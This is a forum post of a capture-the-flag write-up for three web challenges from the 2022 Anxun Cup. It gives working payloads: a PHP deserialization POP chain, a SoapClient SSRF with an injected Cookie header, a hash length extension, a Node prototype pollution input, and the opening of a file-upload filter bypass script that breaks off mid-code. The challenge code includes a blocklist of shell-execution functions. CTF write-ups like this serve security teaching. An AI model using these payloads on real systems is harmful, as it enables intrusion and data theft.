Jump to content

Title: Anxun Cup 2022 Web Writeup

UKhackteam
UKhackteam
in Hacker Cracking / Penetration Testing / Cybersecurity

Featured Replies

Posted

babyphp

index.php:

?php

//something in flag.php

class A

{

public $a;

public $b;

public function __wakeup()

{

$this-a='babyhacker';

}

public function __invoke()

{

if (isset($this-a) $this-a==md5($this-a)) {

$this-b-uwant();

}

}

}

class B

{

public $a;

public $b;

public $k;

function __destruct()

{

$this-b=$this-k;

die($this-a);

}

}

class C

{

public $a;

public $c;

public function __toString()

{

$cc=$this-c;

return $cc();

}

public function uwant()

{

if ($this-a=='phpinfo') {

phpinfo();

} else {

call_user_func(array(reset($_SESSION), $this-a));

}

}

}

if (isset($_GET['d0g3'])) {

ini_set($_GET['baby'], $_GET['d0g3']);

session_start();

$_SESSION['sess']=$_POST['sess'];

}

else{

session_start();

if (isset($_POST['pop'])) {

unserialize($_POST['pop']);

}

}

var_dump($_SESSION);

highlight_file(__FILE__);

flag.php:

?php

session_start();

highlight_file(__FILE__);

//flag in the root directory

if($_SERVER['REMOTE_ADDR']==='127.0.0.1'){

$f1ag=implode(array(new $_GET['a']($_GET['b'])));

$_SESSION['F1AG']=$f1ag;

}else{

echo 'only localhost!';

}

By constructing a pop chain, you can see that session.serialize_handler is php, and combined with the source code of flag.php, it is speculated that the session deserializes SoapClient to perform ssrf

The idea is to first control the parameter of ini_set to specify serialize_handler as php_serialize, pass the parameter sess as the payload of deserialization of SoapClient, then remove all get post parameters and access the page once to trigger deserialization. Finally, use the known pop chain to call the SoapClient __call method to trigger ssrf

Ssrf first uses php's native class GlobIterator to find files starting with f in the root directory, and then uses SplFileObject to read flags.

pop chain payload:

?php

class A

{

public $a;

public $b;

}

class B

{

}

class C

{

public $a;

public $c;

}

$cc=new C();

$cc-a='xxxx';

$a=new A();

$a-a='0e215962017';

$a-b=$cc;

$c=new C();

$c-c=$a;

$b=new B();

$b-a=$c;

echo serialize($b);

ssrf payload:

?php

//$a=new SoapClient(null,array('location'='http://127.0.0.1/flag.php?a=GlobIteratorb=/f*', 'user_agent'='111\r\nCookie: PHPSESSID=c9urdtg4kjp5jl36mrl44qlsah', 'uri'='test'));

$a=new SoapClient(null,array('location'='http://127.0.0.1/flag.php?a=SplFileObjectb=/f1111lllllllaagg', 'user_agent'='111\r\nCookie: PHPSESSID=c9urdtg4kjp5jl36mrl44qlsah', 'uri'='test'));

$b=serialize($a);

echo '|'.urlencode($b);

Use GlobIterator first

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271930808.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271931449.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271934414.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271935912.png

Reuse SplFileObject

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271936690.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271936090.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271938787.png

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271938294.png

EZ_JS

Login interface and enter the account password at will, and then it will jump to /cookie route, right-click to comment jsfuck decryption prompt enter capital

Right-click the home page to comment as follows :

!--This secret is 7 characters long for security!

hash=md5(secret+'flag');//1946714cfa9deb70cc40bab32872f98a

admin cookie is md5(secret+urldecode('flag%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00X%00%00%00%00%00%00%00dog'));

--

One-eye hash length extension attack

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271942270.png

Change the cookie hash directly and found that it was useless. Later, the userid was empty, and an error occurred

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271943926.png

Combined with the previous tips, use the upper and lower case features of js :

'ı'.toUpperCase()=='I' //true

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271944110.png

Then jump to /infoflllllag (the static environment resets every 30 minutes, so the previous picture is captured)

var express=require('express');

var router=express.Router();

const isObject=obj=obj obj.constructor obj.constructor===Object;

const merge=(a, b)={

for (var attr in b) {

if (isObject(a[attr]) isObject(b[attr])) {

merge(a[attr], b[attr]);

} else {

a[attr]=b[attr];

}

}

Return a

}

const clone=(a)={

return merge({}, a);

}

router.get('/', function(req, res, next) {

if(req.flag=='flag'){

//Output flag;

res.send('flag???');

}

res.render('info');

});

router.post('/', express.json(),function(req, res) {

var str=req.body.id;

var obj=JSON.parse(str);

req.cookies.id=clone(obj);

res.render('info');

});

module.exports=router;

It is obvious that the flag attribute of req should be polluted through the prototype chain. The payload is as follows

id={'__proto__':+{'flag':+'flag'}}

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271947808.png

Then turn to get to access the flag

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271948522.png

Screenshot of the static target machine

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271948518.png

ezupload

Upload phpinfo first

https://exp10it-1252109039.cos.ap-shanghai.myqcloud.com/img/202211271949581.png

php 8.0.1, disable_functions filters a bunch, but file_get_contents() is available, and the source code of the question is read through it

html

Body

form method='POST' enctype='multipart/form-data'

This front end is not beautiful!

input type='file' name='upload_file' /

input type='submit' name='submit' value='submit' /

/form

/body

/html

?php

function waf($var): bool{

$blacklist=['\$_', 'eval','copy' ,'assert','usort','include', 'require', '$', '^', '~', '-', '%', '*','file','fopen','fwriter','fput','copy','curl','fread','fget','function_exists','dl','putenv','system','exec','shell_exec','passthru','proc_open','proc_close', 'proc_get_status','checkdnsrr','getmxrr','getservbyname','getservbyport','syslog','popen','show_source','highlight_file','`,'chmod'];

foreach($blacklist as $blackword){

if(strstr($var, $blackword)) return True;

}

return False;

}

error_reporting(0);

//Set Upload Directory

define('UPLOAD_PATH', './uploads');

$msg='Upload Success!';

if (isset($_POST['submit'])) {

$temp_file=$_FILES['upload_file']['tmp_name'];

$file_name=$_FILES['upload_file']['name'];

$ext=pathinfo($file_name,PATHINFO_EXTENSION);

if(!preg_match('/php/i', strtolower($ext))){

die('I don't want pictures, Xiong Da');

}

$content=file_get_contents($temp_file);

if(waf($content)){

die('Oh, what are you doing, little heizi.');

}

$new_file_name=md5($file_name).'.'.$ext;

$img_path=UPLOAD_PATH . '/' . $new_file_name;

if (move_uploaded_file($temp_file, $img_path)){

$is_upload=true;

} else {

$msg='Upload Failed!';

die();

}

echo $msg.' '.$img_path;

Bit operation | is not filtered. Here, take | as an example, use GlobIterator to find flags

import re

preg='\*'

def convertToURL(s):

if s 16:

return '%0' + str(hex(s).replace('0x', ''))

else:

return '%' + str(hex(s).r

  • Quote

    • Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Reply to this topic...
    Go to topic listing

    Important Information

    HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.